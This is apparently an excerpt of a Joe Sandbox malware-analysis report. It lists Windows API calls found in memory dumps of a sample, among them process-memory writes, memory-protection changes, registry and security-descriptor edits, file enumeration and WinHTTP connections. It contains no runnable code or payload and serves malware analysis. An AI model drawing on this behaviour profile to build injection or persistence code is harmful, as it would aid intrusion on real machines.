                  control_flow_graph 1154 1733a0-1733c7 1156 1733c9-1733d1 1154->1156 1157 1733d2-1733e9 1154->1157 1159 1733ef 1157->1159 1160 1734f5-173512 1157->1160 1161 1733f0-17343c VariantClear 1159->1161 1160->1156 1167 173518-17352f 1160->1167 1165 1734e7-1734ec 1161->1165 1166 173442-173456 1161->1166 1165->1161 1168 1734f2 1165->1168 1171 173458-17345c SysFreeString 1166->1171 1172 173462-173471 1166->1172 1173 1735c8-1735dc 1167->1173 1174 173535-17357f VariantClear 1167->1174 1168->1160 1171->1172 1175 173474-173476 1172->1175 1180 173581-173595 1174->1180 1181 1735bf-1735c2 1174->1181 1176 173478-173490 1175->1176 1177 1734dc-1734e2 1175->1177 1183 1734d2-1734d6 SysFreeString 1176->1183 1184 173492-1734bb call 1791c0 1176->1184 1177->1165 1186 173597-1735a9 SysFreeString call 1733a0 1180->1186 1187 1735b4-1735bc 1180->1187 1181->1173 1181->1174 1183->1177 1193 1734bd-1734cd 1184->1193 1194 1734cf 1184->1194 1191 1735ae-1735b1 1186->1191 1187->1181 1191->1187 1193->1183 1194->1183
                  APIs
                  • VariantClear.OLEAUT32(?), ref: 00173575
                  • SysFreeString.OLEAUT32(?), ref: 0017359B
                    • Part of subcall function 001733A0: VariantClear.OLEAUT32(?), ref: 00173432
                    • Part of subcall function 001733A0: SysFreeString.OLEAUT32(0017632B), ref: 0017345C
                    • Part of subcall function 001733A0: SysFreeString.OLEAUT32(?), ref: 001734D6
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 0017F33E
                  • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0017F352
                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0017F38E
                    • Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpCloseHandle.WINHTTP(?,00000000,0017CFBA,0018311D), ref: 001716F2
                  • WinHttpCloseHandle.WINHTTP(?,00000000,0017CFBA,0018311D), ref: 001716FC
                  • WinHttpCloseHandle.WINHTTP(?,00000000,0017CFBA,0018311D), ref: 00171706
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 001789FA
                  • memset.MSVCRT ref: 00178A0C
                    • Part of subcall function 00179070: ??3@YAXPAX@Z.MSVCRT ref: 0017911F
                    • Part of subcall function 0017A380: memset.MSVCRT ref: 0017A3B2
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • memcpy.MSVCRT ref: 00178F45
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 0017DA7A
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017DAB9
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  • _time64.MSVCRT ref: 0017DADB
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017DB0B
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 00181D7F
                  • ??3@YAXPAX@Z.MSVCRT ref: 00181DBE
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  • _time64.MSVCRT ref: 00181DE0
                  • ??3@YAXPAX@Z.MSVCRT ref: 00181E0D
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,001816E1,?,00171C1A,?), ref: 00173D7E
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173D9B
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173DB0
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00173DE8
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • lstrlenW.KERNEL32(0017F91F,00000000,00000000,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002,-00000002), ref: 0017D03D
                  • RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,00000000,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36), ref: 0017D061
                  • RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002), ref: 0017D07C
                  • RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002), ref: 0017D09C
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 00178138
                  • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001781B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000,00000001,?,00182FF0,?,00000000), ref: 00178330
                  • WinHttpConnect.WINHTTP(?,?,00182FF0,00000000,00000001,00000000,00000000,00000001,?,00182FF0,?,00000000), ref: 0017835D
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00175050: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00188880,?), ref: 0017508D
                  • memset.MSVCRT ref: 00171BA3
                  • memset.MSVCRT ref: 00171BB2
                    • Part of subcall function 00174A60: GetProcAddress.KERNEL32(00000000), ref: 00174AC4
                    • Part of subcall function 00174A60: GetNativeSystemInfo.KERNEL32(00000000), ref: 00174ADA
                  • ??2@YAPAXI@Z.MSVCRT ref: 00171BC9
                  • ??2@YAPAXI@Z.MSVCRT ref: 00171BE8
                    • Part of subcall function 00181690: wsprintfW.USER32 ref: 00181829
                    • Part of subcall function 00181690: rand.MSVCRT ref: 00181880
                    • Part of subcall function 0017CF80: _time64.MSVCRT ref: 0017CF92
                    • Part of subcall function 0017CF80: _time64.MSVCRT ref: 0017CFD9
                    • Part of subcall function 00172ED0: GetFileAttributesW.KERNELBASE(?,?,?), ref: 00172F1B
                    • Part of subcall function 00172ED0: CreateDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00172F61
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 001829D8
                    • Part of subcall function 00182870: StrChrW.SHLWAPI(?,0000005C), ref: 001828A3
                    • Part of subcall function 00182870: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001828B8
                    • Part of subcall function 00182870: GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000,00000000), ref: 001828DD
                    • Part of subcall function 00182870: StrChrW.SHLWAPI(?,0000005C), ref: 00182906
                    • Part of subcall function 00182870: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 00182921
                    • Part of subcall function 00182870: RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 00182946
                    • Part of subcall function 00182870: SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 00182962
                  • memset.MSVCRT ref: 00182A05
                  • StrStrW.SHLWAPI(?,0018424C), ref: 00182A22
                    • Part of subcall function 0017F8B0: memset.MSVCRT ref: 0017F8E0
                    • Part of subcall function 0017F8B0: memcpy.MSVCRT ref: 0017F8EB
                  • memset.MSVCRT ref: 00182A47
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • GetLastError.KERNEL32(0017CB21,?,?,00002000,00000040,0018011D,001800C1), ref: 0017B53E
                    • Part of subcall function 00177B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE7B,?,?,?,00000070,?,?,?), ref: 00177B5C
                    • Part of subcall function 0017DC60: VirtualProtectEx.KERNELBASE(0018011D,00000040,00002000,?,001800C1,001800C1,?,0017B5EC,0017CB21,00000000,?,00000002,0017CB21,00000000,C85D89F0,?), ref: 0017DC88
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • memset.MSVCRT ref: 0017B666
                    • Part of subcall function 00171820: GetProcAddress.KERNEL32(00000000,?,?,001800C1,?), ref: 0017186C
                    • Part of subcall function 00176670: GetProcAddress.KERNEL32(00000000,?,?,00000000,0017CB21), ref: 001766BA
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00171B70: memset.MSVCRT ref: 00171BA3
                    • Part of subcall function 00171B70: memset.MSVCRT ref: 00171BB2
                    • Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BC9
                    • Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BE8
                    • Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 0017F1C7
                    • Part of subcall function 00177FC0: SysFreeString.OLEAUT32(?), ref: 00177FFB
                    • Part of subcall function 00177FC0: SysAllocString.OLEAUT32(0017F1F6), ref: 00178005
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017F206
                    • Part of subcall function 0017C8C0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0017C938
                    • Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
                    • Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017F29B
                    • Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FB8D
                    • Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FBA4
                    • Part of subcall function 00177A20: SysFreeString.OLEAUT32(?), ref: 00177A3C
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00173D50: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,001816E1,?,00171C1A,?), ref: 00173D7E
                    • Part of subcall function 00173D50: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173D9B
                    • Part of subcall function 00173D50: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173DB0
                    • Part of subcall function 00173D50: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00173DE8
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • wsprintfW.USER32 ref: 00181829
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  • rand.MSVCRT ref: 00181880
                    • Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
                    • Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 0017DC60: VirtualProtectEx.KERNELBASE(0018011D,00000040,00002000,?,001800C1,001800C1,?,0017B5EC,0017CB21,00000000,?,00000002,0017CB21,00000000,C85D89F0,?), ref: 0017DC88
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                    • Part of subcall function 00171820: GetProcAddress.KERNEL32(00000000,?,?,001800C1,?), ref: 0017186C
                    • Part of subcall function 00176670: GetProcAddress.KERNEL32(00000000,?,?,00000000,0017CB21), ref: 001766BA
                  • memset.MSVCRT ref: 0017B666
                    • Part of subcall function 00177B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE7B,?,?,?,00000070,?,?,?), ref: 00177B5C
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017ADEF
                    • Part of subcall function 00172720: ??2@YAPAXI@Z.MSVCRT ref: 0017273D
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                    • Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52
                    • Part of subcall function 00176190: _itow.MSVCRT ref: 001761DE
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017AF9A
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 0017A0D0: SysFreeString.OLEAUT32(00000000), ref: 0017A0E1
                    • Part of subcall function 0017A0D0: SysFreeString.OLEAUT32(00000001), ref: 0017A0EB
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • GetProcAddress.KERNEL32(00000000), ref: 00174AC4
                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00174ADA
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                    • Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • _wtoi.MSVCRT ref: 0017B047
                    • Part of subcall function 00176190: _itow.MSVCRT ref: 001761DE
                  • _wtoi.MSVCRT ref: 0017B091
                    • Part of subcall function 001743F0: SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 00174451
                    • Part of subcall function 001789B0: memset.MSVCRT ref: 001789FA
                    • Part of subcall function 001789B0: memset.MSVCRT ref: 00178A0C
                    • Part of subcall function 001789B0: memcpy.MSVCRT ref: 00178F45
                    • Part of subcall function 0017DF10: memcpy.MSVCRT ref: 0017DF48
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 00171690: memset.MSVCRT ref: 001716CE
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00172530: FindFirstFileW.KERNELBASE(?,?,?,00000105,*.*), ref: 001725DB
                    • Part of subcall function 00172530: FindNextFileW.KERNELBASE(00000000,00000010), ref: 001726B3
                    • Part of subcall function 00172530: GetLastError.KERNEL32 ref: 001726BD
                  • ??2@YAPAXI@Z.MSVCRT ref: 001757D5
